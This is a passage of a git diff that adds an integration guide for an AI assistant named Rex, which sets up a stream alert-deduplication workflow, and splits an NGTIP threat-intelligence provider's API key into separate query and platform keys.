+When the user wants to start, stop, enable, disable, publish, or unpublish a capability, do not edit the template. Use the runtime endpoint for that capability, such as `/publish`, `/unpublish`, `/syslog-config`, `/kafka-config`, `/poller-config`, or `/triggers`.
+
+If the user chooses draft mode, save the proposed config under `~/.flocks/workspace/outputs/<today>/` and list the path in the final report.
+
+## Report Requirements
+
+The final report must include:
+
+- Workflow id, workflow directory, Storage/SQL config source, and optional fallback `config.json` path.
+- What was configured by the guide.
+- What remains for the user to do, including upstream forwarding, API key/secret setup, broker/channel details, firewall/port needs, and production validation.
+- Sample validation result if a sample was provided.
+- Full final config or draft path.
+- Smoke test results or a clear reason the smoke test was skipped.
+
+Do not look for skill-relative `references/` files during workflow configuration. Workflow-specific details must come from the current workflow's own `guide.md`; this prevents loading stale generic instructions or resolving a project-level skill path as a user-level path.
+
+## Safety Rules
+
+- Never ask the user to paste credentials in chat.
+- Never enable broad/audit outputs without explicit user opt-in.
+- Never clear persistent dedup/state files without explaining the consequence and getting confirmation.
+- Never claim production readiness until a sample or smoke test has passed, or explicitly mark the setup as unvalidated.
+- Be explicit when field mappings are inferred rather than confirmed.
diff --git a/.flocks/plugins/skills/workflow-config-guide/references/stream-alert-dedup-integration-guide.md b/.flocks/plugins/skills/workflow-config-guide/references/stream-alert-dedup-integration-guide.md
new file mode 100644
index 000000000..66434f327
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-config-guide/references/stream-alert-dedup-integration-guide.md
@@ -0,0 +1,471 @@
+# Rex Integration Guide: stream_alert_dedup
+
+> Purpose: This document is injected into Rex when the user opens the workflow Integration tab and starts the intelligent configuration guide. Rex should use it as product/context knowledge, then guide the user step by step with conversational questions and the Question tool.
+
+## 1. Guide Goal
+
+Help a user deploy `stream_alert_dedup` in a new environment with new alert data.
+
+The guide leads the user from "I have a workflow" to "I know exactly what to do next":
+
+- I picked how alerts enter the workflow.
+- I picked the alert source product so fields are auto-mapped.
+- I picked where filtered alerts should go (local files, Kafka, IM push, or a mix).
+- I confirmed or tweaked the denoise and dedup defaults.
+- I pasted one sample and confirmed it normalizes correctly.
+- The workflow's `config.json` was updated to reflect my choices (workflow reads it at runtime via the shared `config_loader.py` helper), or a draft was saved if I wanted to apply later.
+- I got a final report that lists every configuration, every workflow file change, and every remaining step I need to take on my side (device forwarding, ports, downstream bridges, credentials, etc.).
+
+The guide is not a static document. It drives an interactive setup conversation in the Integration tab.
+
+Core principle: **default-everything**. The user is not a security engineer. Rex always proposes a default and only asks the user to confirm or tweak. Technical knobs (syslog protocol, LSH fields, Jaccard threshold, source_log_type plumbing, Kafka brokers, IM session ids) are hidden behind a single "use default / show me details" choice. The user only ever answers questions at the level of "do you want the default?" or "which product are you using?" or "where do you want alerts to go?".
+
+## 2. Workflow Background
+
+`stream_alert_dedup` is a streaming alert deduplication workflow.
+
+Pipeline: `receive_alert -> normalize -> filter_logs -> dedup_and_write`.
+
+- Receives alerts from syslog single-message mode, API batch mode, or file mode.
+- Normalizes TDP and Skyeye-like alerts into a unified schema. Custom products fall back to a generic mapping.
+- Filters out scanner and non-HTTP noise by default, keeps inbound/outbound/lateral HTTP alerts.
+- Deduplicates with strict fields plus MinHash LSH fuzzy fields, persisted across batches.
+- Writes enriched alert JSONL files under the workflow workspace directory.
+- Adds `dedup_key`, `is_duplicate`, `_lsh_cluster_id`, `_source_type`, `_process_type`, `_threat_type`.
+- Output destinations are external: the workflow always writes JSONL locally; Kafka republish and IM push are achieved via downstream bridges that read the JSONL.
+
+Known note: the installed directory may be named `stream_alert_denoise`, but the workflow identity is `stream_alert_dedup`.
+
+## 3. Recommended Conversation Flow
+
+Rex must not ask all questions at once. Use the steps below, one decision at a time. **Each step ends with a Question tool call.** Each default is auto-applied if the user says "use default".
+
+### Step 1: Pick input mode
+
+How alerts enter the workflow. One question, four options.
+
+- **Syslog (real-time stream)** — security device forwards one alert per Syslog message. Most common. Requires the workflow to enable its built-in syslog receiver.
+- **API batch** — upstream calls the workflow HTTP API with a list of alerts. Good for batch import or testing.
+- **Kafka (real-time stream)** — upstream publishes alerts to a Kafka topic. Requires a small consumer/bridge that pulls each message and invokes the workflow API. Rex can draft the bridge script on request.
+- **File** — a JSON file of alerts is dropped in. Good for one-shot replay or offline analysis.
+
+After the user picks, Rex says one sentence on what changes (e.g. "OK, we'll set up a syslog receiver on UDP 5140" or "OK, you'll need a Kafka consumer that calls the workflow API — I'll list the parameters you need in the report at the end") and moves on.
+
+For Kafka mode, Rex follows up in plain chat (not via Question tool) to collect: brokers, topic, consumer group, auth mode, message format (raw JSON / envelope / Avro / Protobuf / text), and whether the user wants Rex to generate the consumer bridge.
+
+### Step 2: Pick alert source product
+
+Which product is generating the alerts. This drives the field mapping in the `normalize` node.
+
+- **TDP / 威胁检测平台** — microstep TDP or compatible NDR. Default mapping already covers `net_http_url`, `threat_name`, etc.
+- **天眼 / SkyEye** — Sangfor SkyEye style fields like `uri`, `vuln_name`, `attack_result`.
+- **Other / Custom** — none of the above; will use a generic best-effort mapping and ask the user to confirm one sample.
+
+Rex then notes: "If your product isn't listed, pick Other — we'll match as much as we can and you'll see the gaps in the final report."
+
+### Step 3: Pick output destinations
+
+Where filtered alerts go after dedup. **Local storage is always on** (the workflow always writes JSONL files). The question is what additional destinations to set up.
+
+Default: **local storage only**. The workflow drops enriched alerts into `~/.flocks/workspace/workflows/stream_alert_dedup/<today>/dedup_result_*.jsonl`. Nothing more to set up.
+
+Options (Rex reads them as multi-select when possible):
+
+- **Local storage only (default)** — JSONL files only. Good for offline analysis or downstream pipelines that read files.
+- **Local storage + Kafka** — alerts also get republished to a Kafka topic. You provide brokers, topic, optional key field.
+- **Local storage + IM push** — alerts get pushed to WeCom / Feishu / DingTalk. You provide channel type and session.
+- **Local storage + Kafka + IM push** — all of the above.
+- **Custom downstream** — alerts feed into another workflow I already have.
+
+Rex then asks one follow-up about **what to send** (default: only filtered-in alerts, not dropped or duplicates):
+
+- **Filtered-in alerts only (default)** — everything that passed denoise and dedup, written to JSONL and forwarded.
+- **Filtered-in unique only** — skip duplicates, only first occurrences. Good for SOC ticket creation.
+- **Audit mode** — also write the dropped and merged alerts to a separate JSONL, for forensics. Use only when investigating; the writer emits `_audit_reason: filtered_out | dedup_merged`.
+
+Rex then says: "By default the workflow only emits alerts that survived filtering. If you choose audit mode, dropped and duplicate alerts are written to a sibling file for forensics."
+
+### Step 4: Confirm denoise strategy
+
+Show the user the default in plain language, ask whether to keep it. The user does not see `filter_enabled`, `process_type`, or HTTP protocol detection — they only see behavior.
+
+Default behavior:
+
+> Keep alerts that look like real web attacks: HTTP traffic, with a clear direction (inbound, outbound, or lateral). Drop scanner traffic and non-HTTP noise.
+
+Options:
+
+- **Use default** — recommended for almost everyone.
+- **Tighten** — keep only inbound HTTP (drop outbound and lateral). Use for internet-facing SOC.
+- **Loosen** — keep everything, no filtering. Use during initial validation only.
+- **Show me the details** — Rex explains the 9 process_type categories in plain language and lets the user pick.
+
+### Step 5: Confirm dedup strategy
+
+Show the default in plain language. The user does not see `strict_fields`, `lsh_fields`, `threshold`, or `max_dedup_keys`.
+
+Default behavior:
+
+> Two alerts are duplicates when they come from the same attacker to the same target, with similar HTTP URL and body. The system learns over time and remembers across batches.
+
+Options:
+
+- **Use default** — recommended for web attack alerting.
+- **Tighter** — only merge when the URL and request body are nearly identical. Use when unrelated alerts are being merged.
+- **Looser** — merge more aggressively on weaker evidence. Use when obvious duplicates are slipping through.
+- **Target-centric** — group by target + rule, ignore attacker. Use for SOC playbooks that care about "what's hitting this asset".
+- **Show me the details** — Rex explains strict vs fuzzy fields and Jaccard threshold in plain language.
+
+### Step 6: Validate with one real sample
+
+Rex asks the user to paste one representative raw alert. The user can choose:
+
+- **I'll paste a real alert** — Rex parses it, reports:
+  - Which fields were auto-mapped to the standard schema.
+  - Which fields were unknown and ignored.
+  - What the normalized alert looks like.
+  - What the dedup_key would be.
+- **I don't have a sample yet** — Rex marks the integration as "configured but unvalidated" and lists this in the final report as a follow-up. No failure.
+
+If the user pastes a sample, Rex must verify:
+
+1. `raw_count` is at least 1.
+2. Required fields (`sip`, `dip`, `req_http_url`, `threat_name`) are present after normalization. If not, Rex calls them out in the report and suggests what to do (most often: pick "Other" in Step 2 and provide a custom mapping, or fix the upstream source).
+3. The dedup_key looks reasonable (non-empty string).
+4. The same alert pasted a second time would get `is_duplicate=true` (Rex can simulate this in plain language).
+
+### Step 7: Apply configuration to config.json
+
+After all decisions are collected and the sample is validated, Rex applies the configuration to **`~/.flocks/plugins/workflows/stream_alert_denoise/config.json`** — the persistent config file the workflow reads at runtime via the shared `config_loader.py` helper. The workflow code itself is NOT modified in this step (it already knows how to read config); only `config.json` is updated.
+
+**7.1 Compute the new config**
+
+Rex reads the current `config.json` (if any), deep-merges the chosen values, and produces the target config dict. Fields Rex writes based on prior steps:
+
+| Field | Source | Notes |
+|---|---|---|
+| `input_mode` | Step 1 | `syslog` / `api` / `kafka` / `file` |
+| `source_product` | Step 2 | `tdp` / `skyeye` / `custom` |
+| `denoise.strategy` | Step 4 | `default` / `tighten` / `loosen` / `custom: ...` |
+| `denoise.filter_enabled` | Step 4 | Derived from `denoise.strategy` |
+| `dedup.strategy` | Step 5 | `default` / `tighter` / `looser` / `target_centric` / `custom: ...` |
+| `dedup.dedup_enabled` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.threshold` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.strict_fields` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.lsh_fields` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.max_field_len` | Step 5 | 500 default, only written if user changes it |
+| `dedup.max_dedup_keys` | Step 5 | 100000 default, only written if user changes it |
+| `dedup.emit_only_first_occurrence` | Step 5 | `true` default, only written if user changes it |
+| `output.destinations` | Step 3 | `["local"]` + selected extras |
+| `output.scope` | Step 3 | `filtered_in` / `filtered_in_unique` / `audit` |
+
+Rex also rewrites the `_comment` field to include the strategy summary.
+
+**7.2 Show the diff and get confirmation**
+
+1. Rex shows a unified diff in chat for `config.json` only (the workflow code is not touched). The diff is plain text, not applied to disk yet.
+2. Rex asks (Question tool, 2 options): "Apply these changes to config.json?"
+   - **Apply** — write to disk, run validation, run smoke test, then move to Step 8.
+   - **Save as draft, don't apply** — keep the diff as a pending draft, skip the smoke test, mark in the report as "configuration not yet applied".
+
+**7.3 Apply and verify (only on Apply)**
+
+3. Rex uses `edit`/`write` to update `config.json` in place.
+4. Rex runs `python3 -c "import json; json.load(open(<path>))"` for JSON syntax validation.
+5. Rex calls `config_loader.reload_config()` then `config_loader.get_config()` in a one-off Python invocation to confirm the helper reads the new file correctly.
+6. Rex runs a smoke test via `run_workflow` (or `run_workflow_node` per node if `run_workflow` is too heavy) with `metadata.sampleInputs` from `workflow.json` (the built-in mock sample) OR the user's pasted sample. All four nodes must return `success=true` with non-empty key outputs.
+7. If any check fails, Rex reverts `config.json` (re-reads the prior content from the diff) and reports the failure in the final report. The user is asked to retry or fall back to draft.
+
+**7.4 Idempotency**
+
+- Re-running the guide with the same answers must produce a no-op or trivial diff (only the `_comment` summary line might change).
+- Re-running the guide with different answers must produce a clean diff that reflects only the new choices; old `strategy: "default"` must not stack on top of new `strategy: "tighten"`.
+- `config_loader` reads config lazily on first call, so re-running the workflow after a config change picks up the new values; no workflow restart is required.
+
+If the user declines in 7.2, Rex saves the configuration as a pending draft to `~/.flocks/workspace/outputs/<today>/stream_alert_dedup_pending_config.json` and lists it in section B of the final report as something the user can apply later.
+
+### Step 8: Final report
+
+Rex writes a single end-of-conversation report (in chat AND to `~/.flocks/workspace/outputs/<today>/stream_alert_dedup_integration_<timestamp>.md`). The report has three clearly separated sections:
+
+**A. Configurations made by this guide (you don't need to do these)**
+
+- Input mode, source product, denoise strategy, dedup strategy, with the actual values plugged in.
+- Output destinations and scope (which alerts are emitted where).
+- Field mapping draft (raw field → standard field → confidence).
+- Sample validation result (if user provided one).
+- **config.json applied (if Step 7.3 ran)**:
+  - Path: `~/.flocks/plugins/workflows/stream_alert_denoise/config.json`
+  - Full final config (every field, with chosen values).
+  - Smoke test result for all four nodes (`success/fail + duration_ms`).
+- **Pending draft (if Step 7 was skipped)**:
+  - Path to the saved draft JSON.
+  - One-line summary of what would change.
+
+**B. What you still need to do, and what info you need to do it**
+
+For each remaining step, the report gives:
+
+- The exact action.
+- The exact info the user must collect (with copy-pasteable templates).
+- The exact command / config snippet they will run.
+
+Examples of remaining steps that the report must cover (the input-mode subsections and the output-mode subsections are independent and only the ones the user picked appear):
+
+- **Syslog mode (input)**: device forwarding target (host:port), protocol, app_name/hostname expectations, sample message body template.
+- **API mode (input)**: workflow invoke URL, API key location (reference to secret manager, never paste in chat), sample request body.
+- **Kafka mode (input)**: broker addresses, topic, consumer group, auth mode, message format, offset strategy, retry/DLQ guidance, and an optional bridge script for Rex to generate.
+- **IM push mode (output)**: channel type, session id, message format, rate limit guidance, sample message template.
+- **Custom product**: which fields failed to map, and what custom mapping needs to be added to the `normalize` node (Rex drafts the code change but does not apply it without explicit user confirmation).
+- **Validate in production**: a 3-step smoke test checklist.
+- **State hygiene**: when the LSH state file will be created, how to clear it, when not to clear it in production.
+
+Rex ends with one sentence: "All set on my side. The remaining items are listed in section B. If you skipped applying in Step 7, the draft config is saved at the path in section A. Once you finish B, paste one real alert here and I'll re-validate."
+
+## 4. Question Tool Usage Pattern
+
+Use the Question tool for any decision point with 2-4 clear options. Always include a "use default" option for technical defaults. Never use Question tool for:
+
+- Asking the user to paste JSON (use plain chat).
+- Asking the user to enumerate field names (use plain chat, or break it down).
+- Collecting secrets or credentials (redirect to secret manager).
+
+When the user picks a custom / non-default option, Rex follows up with one plain-language explanation of what changes, then moves to the next step. Never chain two Question calls in one message.
+
+For Step 3 (output destinations), use the multi-select variant when the UI supports it; otherwise list them in one question with the user expected to type the destinations they want.
+
+## 5. Output Report Template
+
+Rex uses this template for the final report. The report is shown in chat and saved to disk.
+
+```markdown
+# stream_alert_dedup 集成报告
+
+生成时间: <ISO timestamp>
+workflow: stream_alert_dedup
+
+## A. 已完成的配置（你无需操作）
+
+- 输入模式: <syslog | api | file>
+- 告警源产品: <tdp | skyeye | custom>
+- 输出目的地: <local | local+kafka | local+im | local+kafka+im | local+custom>
+- 输出内容范围: <filtered_in | filtered_in_unique | audit>
+- 降噪策略: <default | tighten | loosen | custom: brief description>
+- 去重策略: <default | tighter | looser | target-centric | custom: brief description>
+- 默认字段映射: <raw -> standard, table form>
+- 样例验证: <passed | not provided | failed: reason>
+  - 输入字段数: N
+  - 归一化后字段: sip, dip, req_http_url, ...
+  - 缺失/未知字段: ...
+  - 模拟二次出现 is_duplicate: true/false
+
+## B. 你还需要做什么
+
+### B.1 设备/上游侧配置
+
+<only the relevant subsections appear>
+
+#### Syslog 模式
+- 在 <device> 上配置 syslog 转发:
+  - 目标地址: <flocks-host>:<port>  ← 在工作流发布后由工作流 API 给出
+  - 协议: <udp | tcp | tls>
+  - 一条告警对应一条 Syslog 事件
+  - message 字段必须是完整 JSON 字符串, 不可截断
+- 防火墙: 放通 UDP/TCP 5140 入站
+- 样例 message 模板:
+  ```
+  {"id":"...","net":{"http":{"url":"..."}},"threat":{"name":"..."}}
+  ```
+
+#### API 模式
+- 工作流发布后, 上游调用: POST /api/workflow/<id>/run
+- 请求体: {"inputs": {"alerts": [...], "source_log_type": "tdp"}}
+- API key: 存到 Flocks secret manager, 名称: <suggested name>
+- 样例请求体:
+  ```json
+  { "inputs": { "alerts": [...], "source_log_type": "tdp" } }
+  ```
+
+#### Kafka 模式
+- 你需要: 部署一个轻量消费者/桥, 从 Kafka topic 拉消息, 调工作流 API
+- 消费者输入(部署前要准备好):
+  - brokers: <host1:9092,host2:9092,...>
+  - topic: <如 alerts.raw>
+  - consumer group: <如 stream-alert-dedup-bridge>
+  - 认证: <none | sasl_plain | sasl_ssl, secret 名称>
+  - 消息格式: <raw JSON | envelope | Avro | Protobuf | text>
+  - offset 策略: <latest(新部署) | earliest(回放) | 显式 offset(验证)>
+  - 期望吞吐: <N msg/s> 与 允许重试: <N 次, DLQ 处理>
+- 消费者输出: 解析消息为 JSON 对象, 调工作流 API
+  - 单条: POST /api/workflow/<id>/run body={"inputs":{"alerts":[msg]}}
+  - 批量(可选): 累积 N 条 / T 秒 合并为 alerts 列表
+- 建议: 首次只取 N 条消息做验证, 通过后再放开
+- 是否需要 Rex 生成消费者桥脚本: <是 | 否 | 已生成待你确认>
+- 桥脚本存放位置: ~/.flocks/workspace/outputs/<today>/kafka_bridge_<id>.py
+- 部署方式: <systemd 单元 | docker compose | k8s deployment, 模板见附录>
+
+### B.2 输出目的地配置
+
+<only the relevant subsections appear>
+
+#### 本地存储（默认，始终开启）
+- 落盘目录: ~/.flocks/workspace/workflows/stream_alert_dedup/<today>/
+- 文件名: dedup_result_001.jsonl, 002.jsonl, ...（每文件 10000 条上限）
+- 首行为 file_header, 之后是 enriched_alert 行
+- 审计模式: 另写 dedup_audit_001.jsonl, 含 _audit_reason 字段
+
+#### Kafka 推送（若选了）
+- 模式: 部署一个轻量消费者/桥, 监听本地 JSONL, 转发到 Kafka
+- 你需要提供:
+  - brokers: <host1:9092,host2:9092,...>
+  - topic: <建议名, 如 alerts.dedup>
+  - key 字段: <建议 dedup_key, 保证同一去重簇落同一分区>
+  - 认证: <none | sasl_plain | sasl_ssl, 以及对应的 secret manager 名称>
+- 消息格式: 一条 enriched_alert 一条 Kafka 消息（JSON 序列化）
+- 限流建议: 一次性消费最多 100 行, 避免 OOM
+- 重试与 DLQ: 消费者自己负责, 工作流只保证 JSONL 落盘
+- 是否需要 Rex 生成消费者脚本: <是 | 否 | 已生成待你确认>
+
+#### IM 推送（若选了）
+- 模式: 部署一个 watcher workflow, 监听 JSONL 文件变化, 调用 channel_message
+- 你需要提供:
+  - channel_type: <wecom | feishu | dingtalk>
+  - session_id: <从 IM 客户端获取, 不要在聊天里贴>
+  - 限流: <默认每批 ≤ 5 条, 间隔 30s, 可调>
+- 样例消息模板（按 enriched_alert 字段填充）:
+  ```
+  [stream_alert_dedup] 检测到 1 条告警
+  - 来源: <sip>:<sport> -> <dip>:<dport>
+  - 威胁: <threat_name> / <threat_type>
+  - 方向: <direction> | 协议: <net_type>
+  - 去重键: <dedup_key>
+  - 时间: <time>
+  ```
+- 是否需要 Rex 生成 watcher workflow: <是 | 否 | 已生成待你确认>
+
+#### 自定义下游（若选了）
+- 你的下游系统: <name>
+- 消费方式: <watch JSONL | poll API | 其他>
+- 需要的工作流输出字段: <list>
+- 是否需要 Rex 协助对接: <是 | 否>
+
+### B.3 自定义产品（若选 Other）
+- 失败的字段映射: <list>
+- 需要的修改: 在 normalize 节点新增 <CUSTOM_FIELD_MAP>
+- 是否需要 Rex 协助修改代码: <是/否/已生成 diff 待你确认>
+
+### B.4 上线前 smoke test
+1. 发送 1 条样例告警, 确认 stats.raw_count=1
+2. 同一条再发一次, 确认 is_duplicate=true
+3. 检查落盘文件: ~/.flocks/workspace/workflows/stream_alert_dedup/<today>/dedup_result_001.jsonl
+4. 首行必须是 file_header, 之后是 enriched_alert 行
+5. 如果开启了 IM/Kafka, 确认收到了对应消息/事件
+
+### B.5 状态卫生
+- LSH 状态文件: ~/.flocks/workspace/workflows/stream_alert_dedup/lsh_state_*.pkl
+- 首次执行自动创建
+- 生产环境切勿在排查时直接删除该文件, 会污染去重历史
+- 多租户隔离: 为不同租户拷贝独立工作流(状态目录在工作流目录下, 复制即隔离)
+
+## C. 后续验证
+- 拿到第一条真实告警后, 把它粘回给我, 我会重新跑一遍 Step 6 并更新本报告
+- 如果你后续在 B.2 选了 Kafka/IM/自定义, 把对应信息告诉我, 我帮你生成对接脚本
+- 如果 Step 7 没应用, 确认要应用时告诉我, 我会把 pending_config.json 里的内容重新走一遍 7.2-7.3 流程
+
+## D. config.json 变更 (Step 7 详情)
+
+<only appears when Step 7.3 actually wrote to disk>
+
+### D.1 config.json 变更
+- 路径: ~/.flocks/plugins/workflows/stream_alert_denoise/config.json
+- 修改字段 (old -> new):
+  - input_mode: <old> -> <new>
+  - source_product: <old> -> <new>
+  - denoise.strategy: <old> -> <new>
+  - denoise.filter_enabled: <old> -> <new>
+  - dedup.strategy: <old> -> <new>
+  - dedup.dedup_enabled: <old> -> <new>
+  - dedup.threshold: <old> -> <new>
+  - dedup.strict_fields: <old> -> <new>
+  - dedup.lsh_fields: <old> -> <new>
+  - dedup.max_field_len: <old> -> <new>  (仅在用户改默认时)
+  - dedup.max_dedup_keys: <old> -> <new>  (仅在用户改默认时)
+  - dedup.emit_only_first_occurrence: <old> -> <new>  (仅在用户改默认时)
+  - output.destinations: <old> -> <new>
+  - output.scope: <old> -> <new>
+  - _comment: <old> -> <new>  (重写为含策略摘要的版本)
+- 完整 unified diff: 见报告同目录的 config.json.diff
+
+### D.2 配置加载验证
+- JSON 语法校验: <passed | failed: reason>
+- config_loader.reload_config() 读取新文件: <passed | failed: reason>
+- 读取后 cfg 字段比对: <matched | mismatched: 列出差异>
+  - 与本报告 A 节"已完成的配置"中的值一致
+
+### D.3 冒烟测试结果
+- 样本来源: <内置 mock (metadata.sampleInputs) | 用户粘的样本>
+- 节点执行:
+  - receive_alert.run_workflow_node:    success=<bool>, duration_ms=<n>
+  - normalize.run_workflow_node:        success=<bool>, duration_ms=<n>
+  - filter_logs.run_workflow_node:      success=<bool>, duration_ms=<n>
+  - dedup_and_write.run_workflow_node:  success=<bool>, duration_ms=<n>
+  - (or run_workflow 全链路: success=<bool>, duration_ms=<n>)
+- 关键输出校验:
+  - stats.raw_count: <n>
+  - stats.after_filter_count: <n>
+  - stats.unique_key_count: <n>
+  - enriched_alerts[0].dedup_key 非空: <true | false>
+  - 同条再跑一次 is_duplicate: <true | false>  (若已验证)
+
+### D.4 回滚状态
+- 全部通过: <是 | 否>
+- 失败回滚: <未发生 | 已回滚到 Step 7 之前的内容, 路径: <path>>
+- 报告状态: <config.json 已应用 | config.json 应用失败, 已保存草稿>
+```
+
+## 6. Delivery Requirements for This Guide Feature
+
+UI placement: Add a Rex conversational guide inside the workflow Integration tab. The guide appears near existing integration options such as "Publish as API", "Syslog input", "Kafka config", and downstream output options (Kafka output, IM push). The first message should be proactive and workflow-specific, not a generic chatbot greeting.
+
+Initial context injection: When the user starts the guide, inject this document plus the workflow metadata into Rex. Include workflow ID, workflow name, node list, input schema, output schema, and existing integration status when available. Rex should know whether the workflow is already published as API and whether Syslog/Kafka config exists.
+
+Interaction behavior:
+
+- Rex asks one decision question at a time. Never chain Question calls.
+- Rex always proposes a default; the user only confirms or tweaks.
+- Technical knobs (syslog protocol, LSH fields, threshold, source_log_type, Kafka brokers, IM session ids) are hidden. The user sees "use default" or "show me the details" only.
+- Rex accepts pasted sample alerts and returns a plain-language validation result.
+- Rex can switch modes if the user changes input or output mid-conversation. State is updated in the report.
+- The final report is always written to disk under `~/.flocks/workspace/outputs/<today>/` with a timestamped filename.
+
+Expected final effect: A non-security-engineer can complete first-time deployment without reading workflow JSON. The user knows what the system will do, what they must do, and what info they need to do it.
+
+## 7. Rex Safety and Quality Rules
+
+Rex should:
+
+- Default to safe choices; the user can always override.
+- Be explicit when a field mapping is inferred rather than confirmed.
+- Recommend a small validation run before production traffic.
+- Avoid overwriting production dedup state during tests unless the user confirms.
+- Never ask the user to paste credentials in chat; redirect to the secret manager.
+- Always end with a written report saved to disk, not just chat output.
+- When the user pastes a sample, verify the four Step 6 checks before declaring success.
+- When the user picks "Other / Custom" for product, surface the field gaps in the report instead of silently using a generic mapping.
+- When the user picks an output destination, only emit filtered-in alerts by default; explicitly warn before enabling audit mode.
+- When generating downstream bridges (Kafka consumer, IM watcher), always include rate-limit, retry, and DLQ guidance.
+
+Rex should not:
+
+- Ask technical questions the user can't reasonably answer (protocol, LSH, threshold, source_log_type plumbing, broker addresses, session ids).
+- Assume every source is TDP or Skyeye.
+- Treat Syslog raw text as valid JSON unless the message body is confirmed parseable.
+- Enable production filtering before validating normalized fields.
+- Recommend clearing persistent LSH state without explaining the consequence.
+- Apply code changes (e.g. adding a CUSTOM_FIELD_MAP, generating a watcher workflow) without explicit user confirmation.
+- Promise "it just works" without giving the user a smoke test to run.
+- Emit dropped or duplicate alerts to default destinations without explicit user opt-in to audit mode.
+- Write to `config.json` without first showing the diff and getting explicit "Apply" confirmation in Step 7.2.
+- Modify the workflow code (`workflow.json` node `code` fields) during Step 7 — config.json is the only file Step 7 should touch.
+- Skip the smoke test after applying — `filter_logs` and `dedup_and_write` must be re-run with the new config.
+- Duplicate the "本环境取值" column or stack "## 当前环境配置" sections on a re-run — re-runs must replace, not append.
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml
index f824b4a81..c75b81295 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml
@@ -6,22 +6,29 @@ integration_type: device
 description: >
   NGTIP (Next Generation Threat Intelligence Platform) API service.
   Covers two endpoint categories: intelligence query (port 8090) and
-  platform functions (management / write). Configure APIKEY and both
-  Base URLs in the credentials form.
+  platform functions (management / write). Configure separate APIKEYs
+  and both Base URLs in the credentials form.
 description_cn: >
   NGTIP 威胁情报平台 API 服务，覆盖情报查询（端口 8090）和平台功能（管理写入）两类接口。
-  需分别配置 APIKEY、平台功能 Base URL 和情报查询 Base URL。
+  可分别配置情报查询 APIKEY、平台功能 APIKEY、平台功能 Base URL 和情报查询 Base URL。
 auth:
   type: custom
-  secret: ngtip_apikey
+  secret: ngtip_query_apikey
 credential_fields:
-  - key: apikey
-    label: APIKEY
+  - key: query_apikey
+    label: 情报查询 APIKEY
     storage: secret
-    config_key: apiKey
-    secret_id: ngtip_apikey
+    config_key: queryApiKey
+    secret_id: ngtip_query_apikey
     input_type: password
-    required: true
+    required: false
+  - key: platform_apikey
+    label: 平台功能 APIKEY
+    storage: secret
+    config_key: platformApiKey
+    secret_id: ngtip_platform_apikey
+    input_type: password
+    required: false
   - key: base_url
     label: 平台功能 Base URL
     storage: config
@@ -44,4 +51,5 @@ notes: |
   NGTIP API 分为两类，Base URL 不同，务必在配置中均填写：
     - 平台功能接口：base_url（如 http://192.168.1.100）
     - 情报查询接口：query_base_url（如 http://192.168.1.100:8090）
-  认证：所有接口携带 apikey 参数。情报查询接口推荐 GET 传参，平台功能接口使用 POST JSON。
+  认证：所有接口携带 apikey 参数。情报查询接口使用“情报查询 APIKEY”，平台功能接口使用“平台功能 APIKEY”；
+  旧配置中的单个 apiKey 仍会作为兼容回退值使用。
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml
index 1a044d77d..c47f7a638 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml
@@ -3,8 +3,8 @@ provider: ngtip_api
 
 # Service-level connectivity probe.
 # `query_ip` is chosen because:
-#   - lightweight (GET; only `apikey` + `resource`),
-#   - exercises both `query_base_url` (port 8090) and the apikey,
+#   - lightweight (GET; only query `apikey` + `resource`),
+#   - exercises both `query_base_url` (port 8090) and the query apikey,
 #   - deterministic against 8.8.8.8 (Google DNS).
 connectivity:
   tool: ngtip_query
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py
index e5041dcea..f07583181 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py
@@ -60,8 +60,31 @@ def _ensure_scheme(url: str) -> str:
     return url
 
 
-def _resolve_runtime_config() -> tuple[str, str, int, str, bool]:
-    """Returns (platform_base_url, query_base_url, timeout, apikey, verify_ssl)."""
+def _resolve_api_key(
+    raw: dict[str, Any],
+    *config_keys: str,
+    secret_names: tuple[str, ...] = (),
+    env_name: Optional[str] = None,
+) -> Optional[str]:
+    """Resolve an NGTIP API key from config refs, secrets, then env."""
+    for key in config_keys:
+        value = _resolve_ref(raw.get(key))
+        if value:
+            return value
+
+    manager = _get_secret_manager()
+    for secret_name in secret_names:
+        value = manager.get(secret_name)
+        if value:
+            return value
+
+    if env_name:
+        return os.getenv(env_name)
+    return None
+
+
+def _resolve_runtime_config() -> tuple[str, str, int, Optional[str], Optional[str], bool]:
+    """Returns platform/query base URLs, timeout, query key, platform key, SSL flag."""
     raw = _service_config()
 
     platform_base_url = _ensure_scheme(
@@ -88,23 +111,48 @@ def _resolve_runtime_config() -> tuple[str, str, int, str, bool]:
     except (TypeError, ValueError):
         timeout = DEFAULT_TIMEOUT
 
-    apikey_ref = (
-        raw.get("apiKey")
-        or raw.get("apikey")
-        or raw.get("authentication", {}).get("key")
+    legacy_apikey = (
+        _resolve_ref(
+            raw.get("apiKey")
+            or raw.get("apikey")
+            or raw.get("authentication", {}).get("key")
+        )
+        or _resolve_api_key(
+            raw,
+            secret_names=("ngtip_apikey", f"{SERVICE_ID}_apikey"),
+            env_name="NGTIP_APIKEY",
+        )
     )
-    apikey = (
-        _resolve_ref(apikey_ref)
-        or _get_secret_manager().get("ngtip_apikey")
-        or _get_secret_manager().get(f"{SERVICE_ID}_apikey")
-        or os.getenv("NGTIP_APIKEY")
+
+    query_apikey = (
+        _resolve_api_key(
+            raw,
+            "queryApiKey",
+            "query_apikey",
+            secret_names=("ngtip_query_apikey", f"{SERVICE_ID}_query_apikey"),
+            env_name="NGTIP_QUERY_APIKEY",
+        )
+        or legacy_apikey
     )
